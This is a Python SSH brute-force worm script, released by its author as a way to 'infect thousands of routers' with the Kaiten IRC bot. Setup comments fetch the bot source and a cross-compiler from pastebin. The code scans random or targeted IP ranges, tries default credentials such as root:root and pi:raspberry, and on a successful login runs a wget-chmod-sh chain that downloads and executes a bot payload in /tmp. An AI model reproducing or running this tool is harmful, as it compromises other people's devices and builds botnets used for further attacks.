Python Router SSH scanner

1. #!/usr/bin/env python
2. #~SynthMesc
3. #Lightaidra sucked, so here's kaiten v 6.6.6 - will infect thousands of routers.
4. # To setup, follow the instructions
5. #Download kaiten.c from http://pastebin.com/7Spas23P
6. #-wget http://pastebin.com/raw/7Spas23P -O kaiten.c
7. #scannee and bot modified by SynthMesc/Freak :D
8. #kaiten.c (I didn't create kaiten)
9. #Cross compile it to sh4, powerpc, mipsel, mips, and armv5l.
10. #Use this cross compiler (coded by yours truly): http://pastebin.com/87q15NWF
11. #-wget http://pastebin.com/raw/87q15NWF -O cc7.py
12. #-python cc7.py kaiten.c 0.0.0.0
13. #Where 0.0.0.0 is your servers IP
14. #Put the files in your htdocs directory of a server to host them.
15. #Now install the dependencies
16. #-yum install python-paramiko
17. #Or
18. #-apt-get install python-paramiko
19. #Remember to edit the wget line (CTRL + F "bin.sh")
20. #Set some stuff on your servers so you don't get capped at 476 open SSH connections.
21. #-ulimit -n 99999
22. #-sysctl -w fs.file-max=100000
23. # Run heavyhidra
24. #-python infect.py 376 LUCKY x 0
25. #-python infect.py 376 B 113.53 1
26. #-python infect.py 376 ALL x lol
27. # Donate BTC: 1GbiMJNg9VLcMQp3eTdZo4URxE8X4Je7wJ
28. #NOTE: I wrote this on Wednesday, April 5th. I decided to officially release it. Don't expect quality code, but working code.
29. #Disclaimer: use this for code analysis and entertainment purposes only. The code is quite funny, old, works incredibly well and you are completely liable for anything done on it. I do not permit execution of the following code:
30.  
31. import threading, paramiko, random, socket, time, sys
32.  
33. paramiko.util.log_to_file("/dev/null")
34.  
35. blacklist = [
36.     '127'
37. ]
38.  
39. passwords = [
40.     "root:root",
41.     "root:admin",
42.     "admin:admin",
43.     "ubnt:ubnt"
44.     "root:1234",
45.     "admin:1234",
46.     "guest:guest",
47.     "user:user",
48.     "test:test",
49.     "pi:raspberry",
50.     "vagrant:vagrant",
51.     "admin:admin",
52.     "admin:12345",
53.     "12345:12345",
54.     "admin:password",
55.     "banana:pi",
56.     "pi:banana",
57.     "raspberry:pi",
58.     "pi:raspberry",
59.     "pi:pi"
60. ]
61.  
62. if sys.argv[4] == '1':
63.     passwords = ["root:root", "root:1234", "root:admin", "admin:admin", "admin:12345", "12345:12345", "admin:password", "banana:pi", "pi:banana", "raspberry:pi", "pi:raspberry", "pi:pi"]
64. if sys.argv[4] == 'stable':
65.     passwords = ["root:root"]
66. if sys.argv[4] == 'perl':
67.     passwords = ["pi:raspberry", "raspberry:pi", "pi:raspberry", "root:root", "vagrant:vagrant" "banana:pi"]
68. jackmeoff = random.choice(["Scan for routers"])
69. raw_input('Press <ENTER> To '+jackmeoff)
70.  
71. ipclassinfo = sys.argv[2]
72. if ipclassinfo == "A":
73.     ip1 = sys.argv[3]
74. elif ipclassinfo == "B":
75.     ip1 = sys.argv[3].split(".")[0]
76.     ip2 = sys.argv[3].split(".")[1]
77. elif ipclassinfo == "C":
78.     ips = sys.argv[3].split(".")
79.     num=0
80.     for ip in ips:
81.         num=num+1
82.         if num == 1:
83.             ip1 = ip
84.         elif num == 2:
85.             ip2 = ip
86.         elif num == 3:
87.             ip3 = ip
88. class sshscanner(threading.Thread):
89.     global passwords
90.     global ipclassinfo
91.     if ipclassinfo == "A":
92.         global ip1
93.     elif ipclassinfo == "B":
94.         global ip1
95.         global ip2
96.     elif ipclassinfo == "C":
97.         global ip1
98.         global ip2
99.         global ip3
100.     def run(self):
101.         while 1:
102.             try:
103.                 while 1:
104.                     thisipisbad='no'
105.                     if ipclassinfo == "A":
106.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
107.                     elif ipclassinfo == "B":
108.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
109.                     elif ipclassinfo == "C":
110.                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
111.                     elif ipclassinfo == "BRAZIL":
112.                         br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
113.                         self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
114.                     elif ipclassinfo == "SUPER":
115.                         yeet = ["102", "122","131","161","37","186","187","31","188","201","2","200"]
116.                         self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
117.                     elif ipclassinfo == "LUCKY":
118.                         lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
119.                         self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
120.                     elif ipclassinfo == "LUCKY2":
121.                         lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
122.                         self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
123.                     elif ipclassinfo == "ALL":
124.                         all=['119.93', '91.98', '118.173', '91.99', '92.99',"186.115","31.176","113.53","186.113","190.254","190.255","186.114","95.9","95.6","118.174","190.65","203.249","190.66","190.67","122.176","187.109","60.51","186.119","95.169","190.69","190.253","122.168","201.75","117.156","188.59","177.11","182.74","190.68","118.173","190.252","165.229","84.122", "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","79.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
125.                         self.host = random.choice(all)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
126.                     elif ipclassinfo == "RAND":
127.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
128.                     elif ipclassinfo == "INTERNET":
129.                         lol = ["1"]
130.                         self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
131.                     else:
132.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
133.                     for badip in blacklist:
134.                         if badip in self.host:
135.                             thisipisbad='yes'
136.                     if thisipisbad=='no':
137.                         break
138.                 username='root'
139.                 password=""
140.                 port = 22
141.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
142.                 s.settimeout(3)
143.                 s.connect((self.host, port))
144.                 s.close()
145.                 ssh = paramiko.SSHClient()
146.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
147.                 dobreak=False
148.                 for passwd in passwords:
149.                     if ":n/a" in passwd:
150.                         password=""
151.                     else:
152.                         password=passwd.split(":")[1]
153.                     if "n/a:" in passwd:
154.                         username=""
155.                     else:
156.                         username=passwd.split(":")[0]
157.                     try:
158.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
159.                         dobreak=True
160.                         break
161.                     except:
162.                         pass
163.                     if True == dobreak:
164.                         break
165.                 badserver=True
166.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
167.                 output = stdout.read()
168.                 if "inet addr" in output:
169.                     badserver=False
170.                 if badserver == False:
171.                         print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
172.                         ssh.exec_command("cd /tmp; rm *; wget http://ip/Bot/stun.sh ; chmod +x stun.sh ; sh stun.sh ; rm -f stun.sh")
173.                         time.sleep(20)
174.                         ssh.close()
175.             except:
176.                 pass
177.  
178. for x in range(0,int(sys.argv[1])):
179.     try:
180.         t = sshscanner()
181.         t.start()
182.     except:
183.         pass